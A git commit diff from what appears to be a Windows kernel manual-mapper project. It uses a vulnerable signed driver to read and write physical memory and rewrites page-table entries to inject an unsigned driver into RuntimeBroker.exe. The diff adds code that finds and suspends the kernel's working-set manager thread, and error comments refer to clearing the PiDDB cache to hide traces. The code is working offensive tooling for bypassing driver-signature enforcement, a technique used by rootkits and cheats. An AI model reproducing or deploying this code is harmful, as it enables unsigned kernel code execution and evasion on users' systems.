its not stable but git is being impossible to work with so im just

pushing this shit to master and going 2 bed, fuck it!
master
_xeroxz 4 years ago
parent c9b8d80b22
commit d382cf80cc

@ -202,6 +202,7 @@
<ClCompile Include="map_driver.cpp" />
<ClCompile Include="mem_ctx\mem_ctx.cpp" />
<ClCompile Include="pe_image\pe_image.cpp" />
<ClCompile Include="set_mgr\set_mgr.cpp" />
<ClCompile Include="vdm_ctx\vdm_ctx.cpp" />
</ItemGroup>
<ItemGroup>
@ -209,13 +210,14 @@
<ClInclude Include="map_driver.hpp" />
<ClInclude Include="mem_ctx\mem_ctx.hpp" />
<ClInclude Include="pe_image\pe_image.h" />
<ClInclude Include="set_mgr\set_mgr.hpp" />
<ClInclude Include="util\hook.hpp" />
<ClInclude Include="util\loadup.hpp" />
<ClInclude Include="util\nt.hpp" />
<ClInclude Include="util\util.hpp" />
<ClInclude Include="vdm\raw_driver.hpp" />
<ClInclude Include="vdm\vdm.hpp" />
<ClInclude Include="vdm_ctx\vdm_ctx.h" />
<ClInclude Include="vdm_ctx\vdm_ctx.hpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">

@ -32,6 +32,9 @@
<ClCompile Include="mapper_ctx\mapper_ctx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="set_mgr\set_mgr.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="util\hook.hpp">
@ -64,7 +67,10 @@
<ClInclude Include="pe_image\pe_image.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="vdm_ctx\vdm_ctx.h">
<ClInclude Include="set_mgr\set_mgr.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="vdm_ctx\vdm_ctx.hpp">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>

@ -1,7 +1,8 @@
#include "map_driver.hpp"
#include "mapper_ctx/mapper_ctx.hpp"
#include "vdm_ctx/vdm_ctx.h"
#include "vdm_ctx/vdm_ctx.hpp"
#include "vdm/vdm.hpp"
#include "set_mgr/set_mgr.hpp"
namespace mapper
{
@ -21,18 +22,35 @@ namespace mapper
if (!runtime_broker_pid)
return { mapper_error::failed_to_create_proc, nullptr };
vdm::vdm_ctx v_ctx;
nasa::mem_ctx my_proc(v_ctx, GetCurrentProcessId());
nasa::mem_ctx runtime_broker(v_ctx, runtime_broker_pid);
nasa::mapper_ctx mapper(my_proc, runtime_broker);
vdm::read_phys_t _read_phys =
[&](void* addr, void* buffer, std::size_t size) -> bool
{
return vdm::read_phys(addr, buffer, size);
};
const auto [drv_base, drv_entry] = mapper.map(drv_buffer);
vdm::write_phys_t _write_phys =
[&](void* addr, void* buffer, std::size_t size) -> bool
{
return vdm::write_phys(addr, buffer, size);
};
vdm::vdm_ctx v_ctx(_read_phys, _write_phys);
nasa::mem_ctx my_proc(&v_ctx, GetCurrentProcessId());
nasa::mem_ctx runtime_broker(&v_ctx, runtime_broker_pid);
nasa::mapper_ctx mapper(&my_proc, &runtime_broker);
const auto result =
set_mgr::stop_setmgr(v_ctx,
set_mgr::get_setmgr_pethread(v_ctx));
if (result != STATUS_SUCCESS)
return { mapper_error::set_mgr_failure, nullptr };
const auto [drv_base, drv_entry] = mapper.map(drv_buffer);
if (!drv_base || !drv_entry)
return { mapper_error::init_failed, nullptr };
mapper.call_entry(drv_entry, entry_data);
if (!vdm::unload_drv(drv_handle, drv_key))
return { mapper_error::unload_error, nullptr };

@ -7,13 +7,14 @@ namespace mapper
{
enum class mapper_error
{
error_success = 0x000, // everything is good!
image_invalid = 0x111, // the driver your trying to map is invalid (are you importing things that arent in ntoskrnl?)
load_error = 0x222, // unable to load signed driver into the kernel (are you running as admin?)
unload_error = 0x333, // unable to unload signed driver from kernel (are all handles to this driver closes?)
piddb_fail = 0x444, // piddb cache clearing failed... (are you using this code below windows 10?)
init_failed = 0x555, // setting up library dependancies failed!
failed_to_create_proc = 0x777 // was unable to create a new process to inject driver into! (RuntimeBroker.exe)
error_success, // everything is good!
image_invalid, // the driver your trying to map is invalid (are you importing things that arent in ntoskrnl?)
load_error, // unable to load signed driver into the kernel (are you running as admin?)
unload_error, // unable to unload signed driver from kernel (are all handles to this driver closes?)
piddb_fail, // piddb cache clearing failed... (are you using this code below windows 10?)
init_failed, // setting up library dependancies failed!
failed_to_create_proc, // was unable to create a new process to inject driver into! (RuntimeBroker.exe)
set_mgr_failure // unable to stop working set manager thread... this thread can cause issues with PTM...
};
/// <summary>
@ -23,5 +24,5 @@ namespace mapper
/// <param name="image_size">size of the driver buffer</param>
/// <param name="entry_data">data to be sent to the entry point of the driver...</param>
/// <returns>status of the driver being mapped, and base address of the driver...</returns>
std::pair<mapper_error, void*> map_driver(std::uint8_t* drv_image, std::size_t image_size, void** entry_data);
auto map_driver(std::uint8_t* drv_image, std::size_t image_size, void** entry_data)->std::pair<mapper_error, void*>;
}

@ -4,8 +4,8 @@ namespace nasa
{
mapper_ctx::mapper_ctx
(
nasa::mem_ctx& map_into,
nasa::mem_ctx& map_from
nasa::mem_ctx* map_into,
nasa::mem_ctx* map_from
)
:
map_into(map_into),
@ -14,7 +14,7 @@ namespace nasa
{
const auto map_into_pml4 =
reinterpret_cast<ppml4e>(
map_into.set_page(map_into.get_dirbase()));
map_into->set_page(map_into->dirbase));
// look for an empty pml4e...
for (auto idx = 0u; idx < 256; ++idx)
@ -30,18 +30,20 @@ namespace nasa
auto mapper_ctx::map(std::vector<std::uint8_t>& raw_image) -> std::pair<void*, void*>
{
const auto [drv_alloc, drv_entry_addr] = allocate_driver(raw_image);
auto [drv_ppml4e, drv_pml4e] = map_from.get_pml4e(drv_alloc);
auto [drv_ppml4e, drv_pml4e] = map_from->get_pml4e(drv_alloc);
while (!SwitchToThread());
make_kernel_access(drv_alloc);
map_from.set_pml4e(drv_ppml4e, pml4e{ NULL });
while (!SwitchToThread());
while (!map_from->set_pml4e(drv_ppml4e, pml4e{ NULL }))
continue;
drv_pml4e.nx = false;
drv_pml4e.user_supervisor = false;
map_into.write_phys(reinterpret_cast<ppml4e>(
map_into.get_dirbase()) + this->pml4_idx, drv_pml4e);
// ensure we insert the pml4e...
while (!map_into->write_phys(
reinterpret_cast<ppml4e>(
map_into->dirbase) + this->pml4_idx, drv_pml4e))
continue;
virt_addr_t new_addr = { reinterpret_cast<void*>(drv_alloc) };
new_addr.pml4_index = this->pml4_idx;
@ -50,7 +52,7 @@ namespace nasa
void mapper_ctx::call_entry(void* drv_entry, void** hook_handler) const
{
map_into.v_ctx->syscall<NTSTATUS(__fastcall*)(void**)>(drv_entry, hook_handler);
map_into->v_ctx->syscall<NTSTATUS(__fastcall*)(void**)>(drv_entry, hook_handler);
}
auto mapper_ctx::allocate_driver(std::vector<std::uint8_t>& raw_image) -> std::pair<void*, void*>
@ -60,11 +62,11 @@ namespace nasa
OpenProcess(
PROCESS_ALL_ACCESS,
FALSE,
map_from.get_pid()
map_from->pid
);
if (!process_handle)
return {};
return { {}, {} };
drv_image.fix_imports([&](const char* module_name, const char* export_name)
{
@ -87,7 +89,7 @@ namespace nasa
));
if (!drv_alloc_base)
return {};
return { {}, {} };
virt_addr_t new_addr = { reinterpret_cast<void*>(drv_alloc_base) };
new_addr.pml4_index = this->pml4_idx;
@ -110,15 +112,23 @@ namespace nasa
return
{
reinterpret_cast<void*>(drv_alloc_base),
reinterpret_cast<void*>(drv_image.entry_point() + reinterpret_cast<std::uintptr_t>(new_addr.value))
reinterpret_cast<void*>(drv_image.entry_point() +
reinterpret_cast<std::uintptr_t>(new_addr.value))
};
}
void mapper_ctx::make_kernel_access(void* drv_base)
{
const auto [ppdpte, pdpte] = map_from.get_pdpte(drv_base);
auto ppdpte_phys = reinterpret_cast<void*>((reinterpret_cast<std::uint64_t>(ppdpte) >> 12) << 12); // 0 the last 12 bits...
auto pdpt_mapping = reinterpret_cast<::ppdpte>(map_from.set_page(ppdpte_phys));
const auto [ppdpte, pdpte] =
map_from->get_pdpte(drv_base);
auto ppdpte_phys =
reinterpret_cast<void*>((
reinterpret_cast<std::uint64_t>(ppdpte) >> 12) << 12); // 0 the last 12 bits...
auto pdpt_mapping =
reinterpret_cast<::ppdpte>(
map_from->set_page(ppdpte_phys));
// set pdptes to CPL0 access only and executable...
for (auto pdpt_idx = 0u; pdpt_idx < 512; ++pdpt_idx)
@ -129,7 +139,7 @@ namespace nasa
pdpt_mapping[pdpt_idx].nx = false;
auto pd_mapping = reinterpret_cast<ppde>(
map_from.set_page(reinterpret_cast<void*>(
map_from->set_page(reinterpret_cast<void*>(
pdpt_mapping[pdpt_idx].pfn << 12)));
// set pdes to CPL0 access only and executable...
@ -141,7 +151,7 @@ namespace nasa
pd_mapping[pd_idx].nx = false;
auto pt_mapping = reinterpret_cast<ppte>(
map_from.set_page(reinterpret_cast<void*>(
map_from->set_page(reinterpret_cast<void*>(
pd_mapping[pd_idx].pfn << 12)));
// set ptes to CPL0 access only and executable...
@ -156,14 +166,14 @@ namespace nasa
// set page back to pd...
pd_mapping = reinterpret_cast<ppde>(
map_from.set_page(reinterpret_cast<void*>(
map_from->set_page(reinterpret_cast<void*>(
pdpt_mapping[pdpt_idx].pfn << 12)));
}
}
// set page back to pdpt...
pdpt_mapping = reinterpret_cast<::ppdpte>(
map_from.set_page(ppdpte_phys));
map_from->set_page(ppdpte_phys));
}
}
}

@ -6,14 +6,14 @@ namespace nasa
class mapper_ctx
{
public:
explicit mapper_ctx(nasa::mem_ctx& map_into, nasa::mem_ctx& map_from);
auto map(std::vector<std::uint8_t>& raw_image)->std::pair<void*, void*>;
explicit mapper_ctx(nasa::mem_ctx* map_into, nasa::mem_ctx* map_from);
auto map(std::vector<std::uint8_t>& raw_image) -> std::pair<void*, void*>;
void call_entry(void* drv_entry, void** hook_handler) const;
private:
std::uint16_t pml4_idx;
auto allocate_driver(std::vector<std::uint8_t>& raw_image)->std::pair<void*, void*>;
auto allocate_driver(std::vector<std::uint8_t>& raw_image) -> std::pair<void*, void*>;
void make_kernel_access(void* drv_base);
nasa::mem_ctx map_into, map_from;
nasa::mem_ctx* map_into, *map_from;
};
}

@ -2,20 +2,25 @@
namespace nasa
{
mem_ctx::mem_ctx(vdm::vdm_ctx& v_ctx, DWORD pid)
mem_ctx::mem_ctx(vdm::vdm_ctx* v_ctx, std::uint32_t pid)
:
v_ctx(&v_ctx),
dirbase(get_dirbase(v_ctx, pid)),
v_ctx(v_ctx),
dirbase(get_dirbase(*v_ctx, pid)),
pid(pid)
{
// find an empty pml4e inside of current processes pml4...
const auto current_pml4 =
v_ctx.get_virtual(reinterpret_cast<std::uintptr_t>(
get_dirbase(v_ctx, GetCurrentProcessId())));
v_ctx->get_virtual(reinterpret_cast<std::uintptr_t>(
get_dirbase(*v_ctx, GetCurrentProcessId())));
for (auto idx = 100u; idx > 0u; --idx)
if (!v_ctx.rkm<pml4e>(current_pml4 + (idx * sizeof pml4e)).value)
{
if (!v_ctx->rkm<pml4e>(current_pml4 + (idx * sizeof pml4e)).present)
{
this->pml4e_index = idx;
break;
}
}
// allocate a pdpt
this->new_pdpt.second =
@ -31,13 +36,17 @@ namespace nasa
// get page table entries for new pdpt
pt_entries new_pdpt_entries;
hyperspace_entries(new_pdpt_entries, new_pdpt.second);
this->new_pdpt.first = reinterpret_cast<ppdpte>(new_pdpt_entries.pt.second.pfn << 12);
this->new_pdpt.first =
reinterpret_cast<ppdpte>(
new_pdpt_entries.pt.second.pfn << 12);
// make a new pml4e that points to our new pdpt.
new_pdpt_entries.pml4.second.pfn = new_pdpt_entries.pt.second.pfn;
// set the pml4e to point to the new pdpt
set_pml4e(reinterpret_cast<::ppml4e>(get_dirbase()) + this->pml4e_index, new_pdpt_entries.pml4.second, true);
set_pml4e(reinterpret_cast<::ppml4e>(this->dirbase) +
this->pml4e_index, new_pdpt_entries.pml4.second, true);
// make a new pd
this->new_pd.second =
@ -54,7 +63,10 @@ namespace nasa
// get paging table entries for pd
pt_entries new_pd_entries;
hyperspace_entries(new_pd_entries, this->new_pd.second);
this->new_pd.first = reinterpret_cast<ppde>(new_pd_entries.pt.second.pfn << 12);
this->new_pd.first =
reinterpret_cast<ppde>(
new_pd_entries.pt.second.pfn << 12);
// make a new pt
this->new_pt.second =
@ -71,42 +83,42 @@ namespace nasa
// get paging table entries for pt
pt_entries new_pt_entries;
hyperspace_entries(new_pt_entries, this->new_pt.second);
this->new_pt.first = reinterpret_cast<ppte>(new_pt_entries.pt.second.pfn << 12);
this->new_pt.first =
reinterpret_cast<ppte>(
new_pt_entries.pt.second.pfn << 12);
}
mem_ctx::~mem_ctx()
{
set_pml4e(reinterpret_cast<::ppml4e>(get_dirbase()) + this->pml4e_index, pml4e{NULL});
while (!SwitchToThread());
const auto pml4 =
reinterpret_cast<ppml4e>(
set_page(dirbase))[pml4e_index] = pml4e{ NULL };
}
void* mem_ctx::set_page(void* addr)
{
// table entry change.
++pte_index;
if (pte_index > 511)
{
++pte_index;
if (pte_index >= 511)
{
++pde_index;
pte_index = 0;
}
if (pde_index >= 511)
{
++pdpte_index;
pde_index = 0;
}
++pde_index;
pte_index = 0;
}
if (pdpte_index >= 511)
pdpte_index = 0;
if (pde_index > 511)
{
++pdpte_index;
pde_index = 0;
}
if (pdpte_index > 511)
pdpte_index = 0;
pdpte new_pdpte = { NULL };
new_pdpte.present = true;
new_pdpte.rw = true;
new_pdpte.pfn = reinterpret_cast<std::uintptr_t>(new_pd.first) >> 12;
new_pdpte.user_supervisor = true;
new_pdpte.accessed = true;
// set pdpte entry
*reinterpret_cast<pdpte*>(new_pdpt.second + pdpte_index) = new_pdpte;
@ -116,7 +128,6 @@ namespace nasa
new_pde.rw = true;
new_pde.pfn = reinterpret_cast<std::uintptr_t>(new_pt.first) >> 12;
new_pde.user_supervisor = true;
new_pde.accessed = true;
// set pde entry
*reinterpret_cast<pde*>(new_pd.second + pde_index) = new_pde;
@ -126,7 +137,6 @@ namespace nasa
new_pte.rw = true;
new_pte.pfn = reinterpret_cast<std::uintptr_t>(addr) >> 12;
new_pte.user_supervisor = true;
new_pte.accessed = true;
// set pte entry
*reinterpret_cast<pte*>(new_pt.second + pte_index) = new_pte;
@ -145,18 +155,39 @@ namespace nasa
new_addr.pd_index = this->pde_index;
new_addr.pt_index = this->pte_index;
new_addr.offset = this->page_offset;
// handle TLB issues, the TLB might need to be flushed for this entry...
__try
{
*(std::uint8_t*)new_addr.value = *(std::uint8_t*)new_addr.value;
return new_addr.value;
}
__except (EXCEPTION_EXECUTE_HANDLER)
{
// try again to access the page...
__try
{
*(std::uint8_t*)new_addr.value = *(std::uint8_t*)new_addr.value;
return new_addr.value;
}
// try one last time by yeilding execution...
__except (EXCEPTION_EXECUTE_HANDLER)
{
while (!SwitchToThread())
continue;
}
}
return new_addr.value;
}
void* mem_ctx::get_dirbase(vdm::vdm_ctx& v_ctx, DWORD pid)
{
const auto peproc =
reinterpret_cast<std::uint64_t>(v_ctx.get_peprocess(pid));
reinterpret_cast<std::uint64_t>(
v_ctx.get_peprocess(pid));
const auto dirbase =
v_ctx.rkm<pte>(peproc + 0x28);
return reinterpret_cast<void*>(dirbase.pfn << 12);
return reinterpret_cast<void*>(
v_ctx.rkm<pte>(peproc + 0x28).pfn << 12);
}
bool mem_ctx::hyperspace_entries(pt_entries& entries, void* addr)
@ -201,95 +232,106 @@ namespace nasa
return true;
}
std::pair<ppte, pte> mem_ctx::get_pte(void* addr, bool use_hyperspace)
auto mem_ctx::get_pte(void* addr, bool use_hyperspace) -> std::pair<ppte, pte>
{
if (!dirbase || !addr)
return {};
return { {}, {} };
pt_entries entries;
if ((use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)))
return { entries.pt.first, entries.pt.second };
return {};
return { {}, {} };
}
void mem_ctx::set_pte(void* addr, const ::pte& pte, bool use_hyperspace)
bool mem_ctx::set_pte(void* addr, const ::pte& pte, bool use_hyperspace)
{
if (!dirbase || !addr)
return;
return false;
if (use_hyperspace)
v_ctx->wkm(v_ctx->get_virtual(reinterpret_cast<std::uintptr_t>(addr)), pte);
else
write_phys(addr, pte);
return v_ctx->wkm(
v_ctx->get_virtual(
reinterpret_cast<std::uintptr_t>(addr)), pte);
return write_phys(addr, pte);
}
std::pair<ppde, pde> mem_ctx::get_pde(void* addr, bool use_hyperspace)
auto mem_ctx::get_pde(void* addr, bool use_hyperspace) -> std::pair<ppde, pde>
{
if (!dirbase || !addr)
return {};
return { {}, {} };
pt_entries entries;
if ((use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)))
return { entries.pd.first, entries.pd.second };
return {};
return { {}, {} };
}
void mem_ctx::set_pde(void* addr, const ::pde& pde, bool use_hyperspace)
bool mem_ctx::set_pde(void* addr, const ::pde& pde, bool use_hyperspace)
{
if (!this->dirbase || !addr)
return;
if (!dirbase || !addr)
return false;
if (use_hyperspace)
v_ctx->wkm(v_ctx->get_virtual(reinterpret_cast<std::uintptr_t>(addr)), pde);
else
write_phys(addr, pde);
return v_ctx->wkm(
v_ctx->get_virtual(
reinterpret_cast<std::uintptr_t>(addr)), pde);
return write_phys(addr, pde);
}
std::pair<ppdpte, pdpte> mem_ctx::get_pdpte(void* addr, bool use_hyperspace)
auto mem_ctx::get_pdpte(void* addr, bool use_hyperspace) -> std::pair<ppdpte, pdpte>
{
if (!dirbase || !addr)
return {};
return { {}, {} };
pt_entries entries;
if ((use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)))
return { entries.pdpt.first, entries.pdpt.second };
return {};
return { {}, {} };
}
void mem_ctx::set_pdpte(void* addr, const ::pdpte& pdpte, bool use_hyperspace)
bool mem_ctx::set_pdpte(void* addr, const ::pdpte& pdpte, bool use_hyperspace)
{
if (!this->dirbase || !addr)
return;
if (!dirbase || !addr)
return false;
if (use_hyperspace)
v_ctx->wkm(v_ctx->get_virtual(reinterpret_cast<std::uintptr_t>(addr)), pdpte);
else
write_phys(addr, pdpte);
return v_ctx->wkm(
v_ctx->get_virtual(
reinterpret_cast<std::uintptr_t>(addr)), pdpte);
return write_phys(addr, pdpte);
}
std::pair<ppml4e, pml4e> mem_ctx::get_pml4e(void* addr, bool use_hyperspace)
auto mem_ctx::get_pml4e(void* addr, bool use_hyperspace) -> std::pair<ppml4e, pml4e>
{
if (!this->dirbase || !addr)
return {};
if (!dirbase || !addr)
return { {}, {} };
pt_entries entries;
if ((use_hyperspace ? hyperspace_entries(entries, addr) : (bool)virt_to_phys(entries, addr)))
return { entries.pml4.first, entries.pml4.second };
return {};
return { {}, {} };
}
void mem_ctx::set_pml4e(void* addr, const ::pml4e& pml4e, bool use_hyperspace)
bool mem_ctx::set_pml4e(void* addr, const ::pml4e& pml4e, bool use_hyperspace)
{
if (!this->dirbase || !addr)
return;
if (!dirbase || !addr)
return false;
if (use_hyperspace)
v_ctx->wkm(v_ctx->get_virtual(reinterpret_cast<std::uintptr_t>(addr)), pml4e);
else
write_phys(addr, pml4e);
return v_ctx->wkm(
v_ctx->get_virtual(
reinterpret_cast<std::uintptr_t>(addr)), pml4e);
return write_phys(addr, pml4e);
}
std::pair<void*, void*> mem_ctx::read_virtual(void* buffer, void* addr, std::size_t size)
auto mem_ctx::read_virtual(void* buffer, void* addr, std::size_t size) -> std::pair<void*, void*>
{
if (!buffer || !addr || !size || !dirbase)
return {};
@ -331,7 +373,7 @@ namespace nasa
}
}
std::pair<void*, void*> mem_ctx::write_virtual(void* buffer, void* addr, std::size_t size)
auto mem_ctx::write_virtual(void* buffer, void* addr, std::size_t size) -> std::pair<void*, void*>
{
if (!buffer || !addr || !size || !dirbase)
return {};
@ -373,10 +415,10 @@ namespace nasa
}
}
void mem_ctx::read_phys(void* buffer, void* addr, std::size_t size)
bool mem_ctx::read_phys(void* buffer, void* addr, std::size_t size)
{
if (!buffer || !addr || !size)
return;
return false;
const auto temp_page = set_page(addr);
__try
@ -384,13 +426,16 @@ namespace nasa
memcpy(buffer, temp_page, size);
}
__except (EXCEPTION_EXECUTE_HANDLER)
{}
{
return false;
}
return true;
}
void mem_ctx::write_phys(void* buffer, void* addr, std::size_t size)
bool mem_ctx::write_phys(void* buffer, void* addr, std::size_t size)
{
if (!buffer || !addr || !size)
return;
return false;
const auto temp_page = set_page(addr);
__try
@ -398,12 +443,15 @@ namespace nasa
memcpy(temp_page, buffer, size);
}
__except (EXCEPTION_EXECUTE_HANDLER)
{}
{
return false;
}
return true;
}
void* mem_ctx::virt_to_phys(pt_entries& entries, void* addr)
{
if (!addr || !this->dirbase)
if (!addr || !dirbase)
return {};
const virt_addr_t virt_addr{ addr };
@ -447,37 +495,4 @@ namespace nasa
return reinterpret_cast<void*>((pte.pfn << 12) + virt_addr.offset);
}
unsigned mem_ctx::get_pid() const
{
return pid;
}
void* mem_ctx::get_dirbase() const
{
return dirbase;
}
pml4e mem_ctx::operator[](std::uint16_t pml4_idx)
{
return read_phys<::pml4e>(reinterpret_cast<ppml4e>(this->dirbase) + pml4_idx);
}
pdpte mem_ctx::operator[](const std::pair<std::uint16_t, std::uint16_t>& entry_idx)
{
const auto pml4_entry = this->operator[](entry_idx.first);
return read_phys<::pdpte>(reinterpret_cast<ppdpte>(pml4_entry.pfn << 12) + entry_idx.second);
}
pde mem_ctx::operator[](const std::tuple<std::uint16_t, std::uint16_t, std::uint16_t>& entry_idx)
{
const auto pdpt_entry = this->operator[]({ std::get<0>(entry_idx), std::get<1>(entry_idx) });
return read_phys<::pde>(reinterpret_cast<ppde>(pdpt_entry.pfn << 12) + std::get<2>(entry_idx));
}
pte mem_ctx::operator[](const std::tuple<std::uint16_t, std::uint16_t, std::uint16_t, std::uint16_t>& entry_idx)
{
const auto pd_entry = this->operator[]({ std::get<0>(entry_idx), std::get<1>(entry_idx), std::get<2>(entry_idx) });
return read_phys<::pte>(reinterpret_cast<ppte>(pd_entry.pfn << 12) + std::get<3>(entry_idx));
}
}

@ -1,36 +1,33 @@
#pragma once
#include "../util/nt.hpp"
#include "../vdm_ctx/vdm_ctx.h"
#include "../vdm_ctx/vdm_ctx.hpp"
namespace nasa
{
class mem_ctx
{
friend class mapper_ctx;
public:
explicit mem_ctx(vdm::vdm_ctx& v_ctx, DWORD pid = GetCurrentProcessId());
explicit mem_ctx(vdm::vdm_ctx* v_ctx, std::uint32_t pid = GetCurrentProcessId());
~mem_ctx();
std::pair<ppte, pte> get_pte(void* addr, bool use_hyperspace = false);
void set_pte(void* addr, const ::pte& pte, bool use_hyperspace = false);
auto get_pte(void* addr, bool use_hyperspace = false) -> std::pair<ppte, pte>;
bool set_pte(void* addr, const ::pte& pte, bool use_hyperspace = false);
std::pair<ppde, pde> get_pde(void* addr, bool use_hyperspace = false);
void set_pde(void* addr, const ::pde& pde, bool use_hyperspace = false);
auto get_pde(void* addr, bool use_hyperspace = false) -> std::pair<ppde, pde>;
bool set_pde(void* addr, const ::pde& pde, bool use_hyperspace = false);
std::pair<ppdpte, pdpte> get_pdpte(void* addr, bool use_hyperspace = false);
void set_pdpte(void* addr, const ::pdpte& pdpte, bool use_hyperspace = false);
auto get_pdpte(void* addr, bool use_hyperspace = false) -> std::pair<ppdpte, pdpte>;
bool set_pdpte(void* addr, const ::pdpte& pdpte, bool use_hyperspace = false);
std::pair<ppml4e, pml4e> get_pml4e(void* addr, bool use_hyperspace = false);
void set_pml4e(void* addr, const ::pml4e& pml4e, bool use_hyperspace = false);
void* get_dirbase() const;
auto get_pml4e(void* addr, bool use_hyperspace = false) -> std::pair<ppml4e, pml4e>;
bool set_pml4e(void* addr, const ::pml4e& pml4e, bool use_hyperspace = false);
static void* get_dirbase(vdm::vdm_ctx& v_ctx, DWORD pid);
void read_phys(void* buffer, void* addr, std::size_t size);
void write_phys(void* buffer, void* addr, std::size_t size);
bool read_phys(void* buffer, void* addr, std::size_t size);
bool write_phys(void* buffer, void* addr, std::size_t size);
template <class T>
T read_phys(void* addr)
__forceinline T read_phys(void* addr)
{
T buffer;
read_phys((void*)&buffer, addr, sizeof(T));
@ -38,13 +35,13 @@ namespace nasa
}
template <class T>
void write_phys(void* addr, const T& data)
__forceinline bool write_phys(void* addr, const T& data)
{
write_phys((void*)&data, addr, sizeof(T));
return write_phys((void*)&data, addr, sizeof(T));
}
std::pair<void*, void*> read_virtual(void* buffer, void* addr, std::size_t size);
std::pair<void*, void*> write_virtual(void* buffer, void* addr, std::size_t size);
auto read_virtual(void* buffer, void* addr, std::size_t size) -> std::pair<void*, void*>;
auto write_virtual(void* buffer, void* addr, std::size_t size) -> std::pair<void*, void*>;
template <class T>
__forceinline T read_virtual(void* addr)
@ -61,19 +58,15 @@ namespace nasa
}
void* virt_to_phys(pt_entries& entries, void* addr);
bool hyperspace_entries(pt_entries& entries, void* addr);
void* set_page(void* addr);
void* get_page() const;
unsigned get_pid() const;
pml4e operator[](std::uint16_t pml4_idx);
pdpte operator[](const std::pair<std::uint16_t, std::uint16_t>& entry_idx);
pde operator[](const std::tuple<std::uint16_t, std::uint16_t, std::uint16_t>& entry_idx);
pte operator[](const std::tuple<std::uint16_t, std::uint16_t, std::uint16_t, std::uint16_t>& entry_idx);
private:
bool hyperspace_entries(pt_entries& entries, void* addr);
unsigned pid;
void* dirbase;
vdm::vdm_ctx* v_ctx;
private:
std::uint16_t pml4e_index,
pdpte_index,
pde_index,
@ -83,6 +76,5 @@ namespace nasa
std::pair<ppdpte, ppdpte> new_pdpt;
std::pair<ppde,ppde> new_pd;
std::pair<ppte, ppte> new_pt;
unsigned pid;
};
}

@ -0,0 +1,77 @@
#include "set_mgr.hpp"
namespace set_mgr
{
auto get_setmgr_pethread(vdm::vdm_ctx& v_ctx)->PETHREAD
{
ULONG return_len = 0u;
std::size_t alloc_size = 0x1000u;
auto process_info = reinterpret_cast<SYSTEM_PROCESS_INFORMATION*>(malloc(alloc_size));
while (NtQuerySystemInformation
(
SystemProcessInformation,
process_info,
alloc_size,
&return_len
) == STATUS_INFO_LENGTH_MISMATCH)
process_info = reinterpret_cast<SYSTEM_PROCESS_INFORMATION*>(
realloc(process_info, alloc_size += 0x1000));
const auto og_ptr = process_info;
while (process_info && process_info->UniqueProcessId != (HANDLE)4)
process_info = reinterpret_cast<SYSTEM_PROCESS_INFORMATION*>(
reinterpret_cast<std::uintptr_t>(process_info) + process_info->NextEntryOffset);
auto thread_info = reinterpret_cast<SYSTEM_THREAD_INFORMATION*>(
reinterpret_cast<std::uintptr_t>(process_info) + sizeof SYSTEM_PROCESS_INFORMATION);
static const auto ntoskrnl_base =
util::get_kmodule_base("ntoskrnl.exe");
const auto [ke_balance_um, ke_balance_rva] =
util::memory::sig_scan(
KE_BALANCE_SIG, KE_BALANCE_MASK);
auto rip_rva = *reinterpret_cast<std::uint32_t*>(ke_balance_um + 19);
const auto ke_balance_set = ntoskrnl_base + ke_balance_rva + 23 + rip_rva;
const auto [suspend_in_um, suspend_rva] =
util::memory::sig_scan(SUSPEND_THREAD_SIG, SUSPEND_THREAD_MASK);
rip_rva = *reinterpret_cast<std::uint32_t*>(suspend_in_um + 1);
const auto ps_suspend_thread = reinterpret_cast<void*>(ntoskrnl_base + rip_rva + 5 + suspend_rva);
static const auto lookup_pethread =
util::get_kmodule_export("ntoskrnl.exe", "PsLookupThreadByThreadId");
for (auto idx = 0u; idx < process_info->NumberOfThreads; ++idx)
{
if (thread_info[idx].StartAddress == reinterpret_cast<void*>(ke_balance_set))
{
PETHREAD pethread;
auto result = v_ctx.syscall<PsLookupThreadByThreadId>(
lookup_pethread, thread_info[idx].ClientId.UniqueThread, &pethread);
free(og_ptr);
return pethread;
}
}
free(og_ptr);
return {};
}
auto stop_setmgr(vdm::vdm_ctx& v_ctx, PETHREAD pethread) -> NTSTATUS
{
static const auto ntoskrnl_base =
util::get_kmodule_base("ntoskrnl.exe");
const auto [suspend_in_um, suspend_rva] =
util::memory::sig_scan(SUSPEND_THREAD_SIG, SUSPEND_THREAD_MASK);
const auto rip_rva = *reinterpret_cast<std::uint32_t*>(suspend_in_um + 1);
const auto ps_suspend_thread = reinterpret_cast<void*>(ntoskrnl_base + rip_rva + 5 + suspend_rva);
return v_ctx.syscall<PsSuspendThread>(ps_suspend_thread, pethread, nullptr);
}
}

@ -0,0 +1,18 @@
#pragma once
#include "../vdm_ctx/vdm_ctx.hpp"
using PETHREAD = PVOID;
using PsSuspendThread = NTSTATUS(*)(PETHREAD, PULONG);
using PsLookupThreadByThreadId = NTSTATUS(*)(HANDLE, PETHREAD*);
#define KE_BALANCE_SIG "\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x48\x8B\x88\x00\x00\x00\x00\x48\x8D\x05"
#define KE_BALANCE_MASK "xxxxx????xxx????xxx"
#define SUSPEND_THREAD_SIG "\xE8\x00\x00\x00\x00\x8B\xF8\xBA\x50\x73\x53\x75"
#define SUSPEND_THREAD_MASK "x????xxxxxxx"
namespace set_mgr
{
auto get_setmgr_pethread(vdm::vdm_ctx& v_ctx)->PETHREAD;
auto stop_setmgr(vdm::vdm_ctx& v_ctx, PETHREAD pethread)->NTSTATUS;
}

@ -319,4 +319,54 @@ namespace util
}
return NULL;
}
namespace memory
{
template<std::size_t pattern_length>
__forceinline auto sig_scan(const char(&signature)[pattern_length], const char(&mask)[pattern_length]) -> std::pair<std::uintptr_t, std::uint32_t>
{
static const auto ntoskrnl_module =
LoadLibraryEx(
"ntoskrnl.exe",
NULL,
DONT_RESOLVE_DLL_REFERENCES
);
static const auto p_idh = reinterpret_cast<PIMAGE_DOS_HEADER>(ntoskrnl_module);
if (p_idh->e_magic != IMAGE_DOS_SIGNATURE)
return { {}, {} };
